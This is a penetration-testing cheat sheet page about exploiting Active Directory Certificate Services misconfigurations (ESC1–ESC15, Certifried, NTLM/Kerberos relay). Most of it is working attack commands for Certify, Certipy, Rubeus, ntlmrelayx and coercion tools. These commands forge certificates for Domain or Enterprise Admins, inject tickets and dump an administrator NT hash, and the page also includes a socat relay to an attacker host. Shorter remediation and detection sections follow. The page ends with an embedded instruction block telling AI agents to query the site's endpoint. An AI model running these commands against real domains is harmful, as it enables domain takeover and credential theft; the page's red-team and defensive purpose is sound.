# AD CS [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) ## PKI ? ``` nxc ldap -u user -p pass -M adcs ``` {% embed url="" %} Or run PingCastle or [Certify](#certify) ## ESC {% embed url="" %} | Escalation | Definition | | ------------------------ | ---------------------------------------------------------------------------------------------- | | [ESC1](#esc1) | Enrolee can request cert for ANY user | | ESC2 | Any purpose or no EKU (potentially dangerous) | | [ESC3](#esc3) | Request an enrollement agent certificate and use it to request cert on behalf of ANY user | | ESC4 | Overly permissive ACLs on templates | | ESC5 | Poor access control on CA server, CA server computer object, etc. | | [ESC6](#esc6) | EDITF\_ATTRIBUTESUBJECTNAME2 setting on CA - Request certs for ANY user | | ESC7 | Poor access control on roles on CA authority like "CA Administrator" and "Certificate Manager" | | [ESC8](#esc8-petitpotam) | NTLM relay to HTTP enrollement endpoints | {% embed url="" %} ## NXC ### Vulnerable Template ``` nxc smb IP -u user -d domain.local -p password -M enum_ca ```

### Masky If you have admin privilege, the module will impersonate all users connected -> ask a certificate (ADCS) -> retrieve the NT hash using PKINIT

Source: ## Tools ### Locksmith {% embed url="" %} ``` # Run all scans Invoke-Locksmith -Scan All ``` ### Certify {% embed url="" %} {% embed url="" %} {% embed url="" %} #### Enumeration AD CS in the target forest ``` Certify.exe cas ``` Templates ``` Certify.exe find ``` Vulnerable templates ``` Certify.exe find /vulnerable ``` ### Certi {% embed url="" %} ``` $ certi.py list 'contoso.local/Han' -k -n --dc-ip 192.168.100.2 --vuln --enable | grep ESC3 -B 3 Name: User Schema Version: 1 Enroll Services: contoso-DC01-CA Vulnerabilities: ESC3.2 - Use Agent Certificate -- Name: Administrator Schema Version: 1 Enroll Services: contoso-DC01-CA Vulnerabilities: ESC3.2 - Use Agent Certificate ``` ### Certipy {% embed url="" %} {% embed url="" %} Vulnerable template ``` # certipy find -u ca_operator -p NewPassword0xss0rz -dc-ip 10.10.11.41 -vulnerable -enabled Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 34 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates [*] Trying to get CA configuration for 'domain-DC01-CA' via CSRA [!] Got error while trying to get CA configuration for 'domain-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error. [*] Trying to get CA configuration for 'certified-DC01-CA' via RRP [*] Got CA configuration for 'domain-DC01-CA' [*] Saved BloodHound data to '20241126073356_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k [*] Saved text output to '20241126073356_Certipy.txt' [*] Saved JSON output to '20241126073356_Certipy.json' # cat 20241126073356_Certipy.txt | grep ESC ESC9 : 'DOMAIN.HTB\\operator ca' can enroll and template has no security extension # cat 20241126073356_Certipy.txt ``` ### PSPKIAudit {% hint style="danger" %} *Only ESC1 to ESC8* {% endhint %} {% embed url="" %} ### Metasploit {% embed url="" %} ### ADCSKiller {% embed url="" %} ## Practice and explanation {% embed url="" %} {% embed url="" %} ## ESC1 This attack consists of adding an arbitrary subject to a certificate. {% embed url="" %} {% embed url="" %} "VulnTemplate" has ENROLLEE\_SUPPLIES\_SUBJECT value for msPKI-Certificates-Name-Flag ``` Certify.exe find /enrolleeSuppliesSubject ``` "VulnTemplate" allows enrollment to RDPUsers group. 1. Request a certificate for DA (or EA) as a user1 (member of RDP group) ``` Certify.exe request /ca:dc.parent.local\DC-CA /template:"VulnTemplate" /altname:administrator ``` 2. Convert cert.pem to pfx and use it to request a TGT for DA (or EA) ``` Rubeus.exe asktgt /user:administrator /certificate:esc1.pfx /password:passw0rd /ptt ``` ### Linux - Certipy ``` # certipy req -u 'BANKING$@retro.vl' -p 'P@ssw0rd' -dc-ip '10.10.118.214' -ca 'retro-DC-CA' -template 'RetroClients' -upn 'Administrator@retro.vl' ``` If `Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template,` Go back to the `certipy find` result and get the `RSA Key Length`. Append it to the command: `-key-size` ``` # certipy req -u 'BANKING$@retro.vl' -p 'P@ssw0rd' -dc-ip '10.10.118.214' -ca 'retro-DC-CA' -template 'RetroClients' -upn 'Administrator@retro.vl' -key-size 4096 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 10 [*] Got certificate with UPN 'Administrator@retro.vl' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx' ``` ``` # certipy auth -pfx administrator.pfx Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@retro.vl [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389 ``` {% embed url="" %} ### Kerberos error : « Object SID mismatch between certificate and user » To fix this, you can specify an **alternative subject SID** using the `-SID` option. ``` $ certipy req -u "user@domain.local" -p password -dc-ip [IP] -target "Target_IP] -ca 'ADCS-name' -template 'ESC1' -upn administator@domain.local -sid [Certificate_object_SID] $ certipy auth -pfx administrator.pfx -dc-ip [IP] -debug ``` ## ESC2 {% embed url="" %} Find vulnerable templates ``` certipy find -u 'bspears' -p REDACTED -dc-ip 10.10.0.10 -vulnerable -enabled ``` Exploit ``` certipy-ad req -u 'bspears' -p 'REDACTED' \ -dc-ip '10.10.0.10' \ -target 'dc01.foobar.com' \ -ca 'foobar-CA' \ -template 'ESC2_User'-debug ``` ``` certipy-ad req -u 'bspears' -p 'REDACTED' -dc-ip '10.10.0.10' \ -target 'dc01.foobar.com' -ca 'foobar-CA' \ -template 'User' \ -on-behalf-of 'example\administrator' \ -pfx bspears.pfx -debug ``` ## ESC3 Request an enrollement agent certificate and use it to request cert on behalf of ANY user {% embed url="" %} {% embed url="" %} "VulnTemplateEnrollement-Agent" allows Domain users to enroll and has 'Certificate Request Agent' EKU "VulnTemplateEnrollement-Users" has an Application Policy Issuance Requirement of Certificate Request Agent and has an EKU that allows for domain authentication ### Escalation to DA `child.parent.local`: child domain `parent.local`: parent domain 1. Request a certif for Certificate Request Agent from "VulnTemplateEnrollement-Agent" template ``` Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Agent ``` 2. Convert cert.pem to pfx and use it to request a cert on behalf on DA using "VulnTemplateEnrollement-Users" ``` openssl.exe pkcs12 -in C:\path\to\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\path\to\esc3agent.pfx ``` ``` Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Users /onbehalfof:child\administrator /enrollcert:esc3agent.pfx /enrollcertpw:passw0rd ``` 3. Convert from cert.pem to pfx, request DA TGT and inject it ``` openssl.exe pkcs12 -in C:\path\to\DA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\path\to\esc3user-DA.pfx ``` ``` Rubeus.exe asktgt /user:administrator /certificate:esc3user-DA.pfx /password:passw0rd /ptt ``` ### Escalation to EA 1. Request a certif for Certificate Request Agent from "VulnTemplateEnrollement-Agent" template - see Escalation to DA 2. Convert cert.pem to pfx and use it to request a cert on behalf on EA using "VulnTemplateEnrollement-Users ``` Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Users /onbehalfof:parent.local\administrator /enrollcert:esc3agent.pfx /enrollcertpw:passw0rd ``` 3. Request EA TGT and inject it ``` Rubeus.exe asktgt /user:parent.local\administrator /certificate:esc3user-EA.pfx /dc:dc.parent.local /password:passw0rd /ptt ``` ## ESC4 {% embed url="" %} ``` certipy template -u billy@foobar.com -p REDACTED -template ESC4Certificate_FOOBAR -dc-ip -save-old ``` ``` certipy req -u 'billy@foobar.com' -p 'REDACTED' -dc-ip '10.10.1.100' -target 'foobar-CA.foobar.com ' -ca 'foobar-CA' -template 'ESC4Certificate_FOOBAR' -upn 'DA_Dan@foobar.com' ``` ``` certipy auth -pfx DA_Dan.pfx ``` Clean up ``` certipy template -u user@foobar.com \ -p REDACTED \ -template ESC4Certificate_FOOBAR \ -dc-ip \ --configuration 'ESC4Certificate_FOOBAR.json' ``` ## ESC6 `EDITF_ATTRIBUTESUBJECTNAME2` setting on CA - Request certs for ANY user from a template that allow enrollment to low-priv user {% embed url="" %} "Vuln-Integration" grants enrollment to RDPUsers group. 1. Request a certificate for DA (or EA) as a user1 (member of RDP group) ``` Certify.exe request /ca:dc.parent.local\DC-CA /template:"Vuln-Integration" /altname:administrator ``` 2. Convert cert.pem to pfx and use it to request a TGT for DA (or EA) ``` Rubeus.exe asktgt /user:administrator /certificate:esc6.pfx /password:passw0rd /ptt ``` ## ESC8 - PetitPotam {% embed url="" %} NTLM relay to HTTP enrollement endpoints {% embed url="" %} {% embed url="" %} {% content-ref url="/pages/I4NRzgXjYAqaVdEvyCaO" %} [Windows Exploit](/0xss0rz/pentest/internal-pentest/windows-exploit.md) {% endcontent-ref %} ## ESC9 {% embed url="" %} {% embed url="" %} ## Certifried - CVE-2022-26923 {% embed url="" %} {% embed url="" %} ## ADCSCoercePotato {% embed url="" %} {% embed url="" %} On the attacker system: ``` socat TCP-LISTEN:135,reuseaddr,fork TCP::9999 ``` On a domain-joined system: ``` ADCSCoercePotato.exe -m -k -u -p -d -c D99E6E74-FC88-11D0-B498-00A0C90312F3 ``` Relay with ntlmrelayx.py to the ADCS Web enrollment Endpoint: ``` impacket-ntlmrelayx -t http:///certsrv/certrqus.asp --adcs --template -smb2support ``` {% embed url="" %} ## RemoteKrbRelay {% embed url="" %} ``` RemoteKrbRelay.exe -adcs -template domaincontroller -target -victim -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 ``` ## CertPotato {% embed url="" %} ## KrbRelay-SMBServer {% embed url="" %} {% content-ref url="/pages/U8eqdKM6nZf8itEk6Q6C" %} [Network Attacks](/0xss0rz/pentest/internal-pentest/network-attacks.md) {% endcontent-ref %} ## ESC14 {% embed url="" %} ## ADCS ESC15 (EKUwu) - CVE-2024-49019 {% hint style="danger" %} The TrustedSec team tested the CVE-2024-49019 vulnerability across multiple clients, *finding that 10 out of 15 environments were at risk* {% endhint %} {% embed url="" %} Detection: Bloodhound query ``` MATCH p=(:Base)-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain) WHERE ct.enrolleesuppliessubject = True AND ct.authenticationenabled = False AND ct.requiresmanagerapproval = False AND ct.schemaversion = 1 RETURN p ```

Credit: [@SpecterOps](https://x.com/SpecterOps) ### Exploitation {% embed url="" %} {% embed url="" %}

## From Child to Forest {% embed url="" %} ## Relay Attack on WinReg RPC Client {% embed url="" %} {% embed url="" %} ## Remediation {% embed url="" %} {% embed url="" %} {% embed url="" %} The following security controls should be implemented to mitigate an ESC1 AD CS compromise: * **Remove the Enrolee Supplies Subject flag.** Do not allow users to provide their own SAN in the certificate signing request for templates configured for client authentication. Templates configured with the Enrolee Supplies Subject flag allow a user to provide their own SAN. * **Restrict standard user object permissions on certificate templates.** Standard user objects should not have write permissions on certificate templates. User objects with write permissions may be able to change enrolment permissions or configure additional settings to make the certificate template vulnerable. * **Remove vulnerable AD CS CA configurations.** Ensure that the CA is not configured with the EDITF\_ATTRIBUTESUBJECTALTNAME2 flag. When configured, this allows a SAN to be provided on any certificate template. * **Require CA Certificate Manager approval for certificate templates that allow the SAN to be supplied.** This ensures certificate templates that require CA certificate manager approval are not issued automatically when requested; instead, they must be approved using certificate manager before the certificate is issued. * **Remove EKUs that enable user authentication.** This prevents malicious actors from exploiting the certificate to authenticate as other users. * **Limit access to AD CS CA servers to only privileged users that require access.** This may be a smaller subset of privileged users than the Domain Admins security group and reduces the number of opportunities for malicious actors to gain access to CA servers. * **Restrict privileged access pathways to AD CS CA servers to jump servers and secure admin workstations using only the ports and services that are required for administration.** AD CS servers are classified as ‘Tier 0’ assets within Microsoft’s ‘[Enterprise Access Model](https://learn.microsoft.com/en-us/security/privileged-access-workstations/privileged-access-access-model)’. * **Only use AD CS CA servers for AD CS and do not install any non-security-related services or applications.** This reduces the attack surface of AD CS CA servers as there are fewer services, ports and applications that may be vulnerable and used to compromise an AD CS CA server. * **Encrypt and securely store backups of AD CS CA servers and limit access to only Backup Administrators.** Backups of AD CS CA servers need to be afforded the same security as the actual AD CS CA servers. Malicious actors may target backup systems to gain access to critical and sensitive computer objects, such as AD CS CA servers. * **Centrally log and analyse AD CS CA server logs in a timely manner to identify malicious activity.** If malicious actors gain privileged access to a CA server, this activity should be identified as soon as possible to respond and limit the impact. ## Detection ADCS Honeypot {% content-ref url="/pages/88ytmL97GJggkSVkBq3H" %} [Detection](/0xss0rz/pentest/internal-pentest/detection.md) {% endcontent-ref %} {% embed url="" %} ## Resources {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/ad-cs.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.